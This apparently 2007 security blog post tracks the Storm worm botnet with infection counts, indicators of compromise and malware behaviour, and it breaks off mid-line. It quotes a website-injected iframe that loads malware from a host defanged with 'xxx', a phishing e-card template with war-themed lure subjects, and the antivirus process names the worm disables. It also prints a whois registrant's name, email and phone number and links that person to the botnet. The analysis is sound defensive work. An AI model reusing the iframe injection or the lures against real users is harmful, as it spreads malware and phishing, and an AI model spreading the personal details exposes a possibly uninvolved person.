It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.

E-Greetings ... Yes, they are pare of stormworm/peacom/peed.

Many of you may have already received email like this:

Hi. School mate has sent you a postcard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http ://127.0.0.1/? 5b23933165b19d3383b4c009ee64d82c3a9ebee

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

We hope you enjoy your awesome card.

Wishing you the best,
Mail Delivery System,
hallmark.com

We've certainly noticed them hitting our email drops. The link points to ecard.exe, or another binary file. To date we've captured over 6,500 unique binaries related to this spam. (Full list available here.)

Once downloaded this bot will then make connections to other peers on the storm network. There are over 250 hard coded peers in the list, however many appear to be red herrings, so I will not post the list here until I can confirm each and every one.

Selected drones are turned into proxy spreaders. Which means they proxy a connection to the 'main' server (located at: 205.209.X.X).

I'm working with Shadowserver to get the binaries mass submitted to their anti-virus check service. A spot check of 15 random binaries yielded pretty much the same results:

AhnLab-V2, Authentium, Avast, AVG, ClamAV, eTrust-Vet, Ewido, FileAdvisor, F-Prot, F-Secure, McAfee, Norman, Panda, Symantec, TheHacker, VBA32, and VirusBuster were UNABLE to identify the binary at all.

Several other engines identified it as 'suspicious'. The most consistant results came from: (in order) Bitdefender, Nod32, Sophos, Kaspersky and Microsoft.

Please be extra careful clicking on links in email, even from trusted parties!

DISOG at Defcon -- its raining storm emails.

DISOG will be present at Defcon 15 in Las Vegas August 2nd through August 5th.
At least three people from DISOG will be there. We are trying to get our colleges from Shadowserver to join us as well.
We are not presenting this year, but will be happy to answer any botnet questions behind closed doors.
If you'll be there and would like to meet up with us, please send me an email!

--

The storm worm is gathering power for its next round of spam. Just a quick reminder not to click on links in email. I recently cleaned the system of a neighbor who had over 100 pieces of malicious code on her system, all related to Storm. She knew the computer was infected, because the code made her system so unstable it would crash after running for 30 seconds.
Prepare for another wild round soon!

Storm worm goes nuclear.

We've received reports about malware spreading with war related subject lines. The user reporting did not have a copy of the malware, but one of my email drops did. The binary appears to be communicating with several other systems over high, semi random UDP ports. The ISC has posted a diary related to this event. It can be found here.

File: Click Me.exe (95c563731b7828d6e98eae81ee08869f)

Subject lines in email:

USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more than 20000 Iranian citizens
Missle Strike: The USA kills more than 1000 Iranian citizens
Missle Strike: The USA kills more than 10000 Iranian citizens
Isreal Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III

Spreads as one of the following attachments:

More.exe
Read More.exe
Click Here.exe
Read Me.exe
Movie.exe
News.exe
Video.exe

Opened port UDP 11274 listener. (visible with netstat -ao)

Communication via UDP with over 200 peers:

124.111.241.36, 124.150.75.126, 124.240.126.252, 125.131.29.176, 125.177.33.8, 125.25.203.140, 128.2.223.2, 131.114.13.230, 134.95.128.1, 141.30.123.42, 151.37.79.55, 154.37.66.117, 154.37.66.118, 154.37.66.119, 154.37.66.140, 154.37.66.163, 154.37.66.164, 154.37.66.186, 154.37.66.187, 154.37.66.209, 154.37.66.210, 160.75.14.190, 161.53.119.17, 193.198.36.3, 193.238.109.16, 194.15.147.40, 194.226.192.151, 195.111.2.70, 195.146.64.57, 195.158.117.39, 195.208.208.23, 195.5.19.34, 200.40.182.198, 202.71.93.14, 203.59.209.219, 207.212.26.3, 207.226.112.34, 209.222.54.55, 210.107.134.172, 211.178.169.34, 211.201.180.65, 211.51.122.173, 211.54.19.45, 212.42.91.82, 213.112.20.102, 213.251.132.34, 213.96.139.108, 216.130.188.168, 216.151.155.28, 216.151.155.52, 216.224.114.210, 217.127.81.254, 217.147.35.23, 217.160.208.201, 217.216.190.61, 217.229.107.161, 217.255.238.238, 217.8.61.68, 218.169.117.123, 219.7.138.42, 220.240.123.155, 220.78.177.58, 220.86.152.249, 222.101.241.112, 24.185.38.143, 24.232.127.169, 24.23.233.158, 24.91.13.235, 58.231.142.136, 61.228.201.222, 62.112.100.44, 62.1.122.240, 62.117.184.135, 62.121.113.97, 62.131.242.45, 62.149.227.219, 62.16.233.229, 62.204.120.132, 62.233.197.214, 62.234.51.180, 62.45.4.26, 64.229.75.158, 65.100.22.172, 66.90.79.226, 66.97.29.33, 67.15.4.10, 67.170.214.104, 68.13.18.8, 68.42.150.171, 69.26.174.131, 69.26.191.34, 69.63.60.170, 71.114.0.6, 71.133.154.97, 71.62.123.187, 72.224.137.213, 72.232.137.18, 72.36.146.114, 76.169.66.144, 80.102.127.102, 80.116.163.193, 80.132.226.44, 80.146.66.14, 80.171.187.9, 80.178.220.187, 80.62.149.20, 81.173.164.247, 81.174.12.96, 81.202.135.20, 81.202.47.48, 81.203.146.158, 81.204.129.108, 81.220.135.194, 81.2.209.136, 81.244.78.93, 81.248.26.210, 81.251.130.12, 81.37.253.45, 81.56.28.52, 81.57.135.146, 81.68.144.107, 81.83.232.171, 81.88.117.121, 81.9.204.210, 82.143.237.175, 82.156.34.116, 82.159.247.33, 82.225.194.86, 82.231.107.108, 82.231.149.214, 82.231.223.75, 82.235.41.53, 82.238.26.118, 82.241.209.40, 82.245.157.248, 82.55.220.212, 82.59.77.21, 82.66.238.182, 82.67.168.28, 82.74.157.18, 82.92.253.142, 83.160.229.119, 83.165.141.129, 83.180.72.197, 83.19.165.243, 83.19.172.30, 83.199.215.211, 83.22.0.248, 83.222.14.114, 83.29.217.233, 83.37.140.132, 83.38.133.154, 83.40.205.158, 83.45.120.73, 83.97.181.149, 84.10.255.230, 84.115.20.205, 84.121.30.130, 84.123.166.106, 84.123.216.174, 84.134.174.205, 84.137.122.192, 84.157.114.165, 84.16.225.19, 84.16.230.162, 84.16.234.75, 84.16.239.110, 84.186.113.5, 84.205.2.117, 84.40.221.36, 84.48.106.96, 84.57.181.194, 84.58.177.68, 84.73.206.231, 84.74.226.207, 84.80.109.203, 84.82.181.136, 84.94.92.106, 84.97.208.35, 84.97.223.102, 85.118.33.111, 85.118.37.162, 85.118.41.93, 85.136.165.33, 85.137.87.194, 85.214.40.169, 85.216.228.7, 85.219.217.113, 85.234.37.43, 85.249.225.64, 85.25.136.89, 85.66.37.33, 85.76.252.138, 86.149.162.197, 87.0.79.250, 87.10.167.240, 87.1.102.103, 87.167.190.214, 87.184.146.152, 87.234.144.208, 87.5.76.207, 88.1.156.113, 88.191.11.45, 88.191.13.247, 88.191.15.80, 88.191.20.102, 88.191.21.31, 88.191.28.48, 89.145.34.71, 89.220.0.127, 89.85.252.147, 90.197.74.155, and 90.27.33.59

Communication made through a random UDP port. The most common port is 30191 followed by 1857, 4061, 1859 and 1853.

Disables processes with the window names: blackice firewall avg vsmon zonealarm spybot nod32 regedit mcafee taskmgr hijackthis msconfig antivirus nav avp

Creates wincom32.ini with the following data:

[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
...
F4842DAE3B27F129678E1847263CAB26=54506DCB17E800
F63EDCCBDCAF1A1E79DEC78C8666B552=58BF0F50468500
FD6A5500DC3ED6A4E8398E3580A974FA=48249272325D00
FDD38B10A859838455DF59392B3C3F71=51398792233800

Scans files on the harddrive for email addresses to spread to. Spreads with built in SMTP relay.

Rootkit Revealer Output:

HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_WINCOM32 4/8/2007 11:45 PM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_WINCOM32\0000\DeviceDesc 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32 4/9/2007 12:45 AM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32\ImagePath 4/9/2007 12:45 AM 74 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet001\Services\wincom32\DisplayName 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_WINCOM32 4/8/2007 11:45 PM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_WINCOM32\0000\DeviceDesc 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32 4/9/2007 12:45 AM 0 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32\ImagePath 4/9/2007 12:45 AM 74 bytes Hidden from Windows API.
HKLM\SYSTEM\ControlSet002\Services\wincom32\DisplayName 4/9/2007 12:45 AM 18 bytes Hidden from Windows API.
C:\WINDOWS\system32\wincom32.sys 4/8/2007 11:45 PM 52.75 KB Hidden from Windows API.

(hint: type c:\windows\system32\wincom32.sys >c:\windowstrojan.sys)

wincom32.sys (f9d04e27f908f9c50fd5ce2aeea72b08) infected: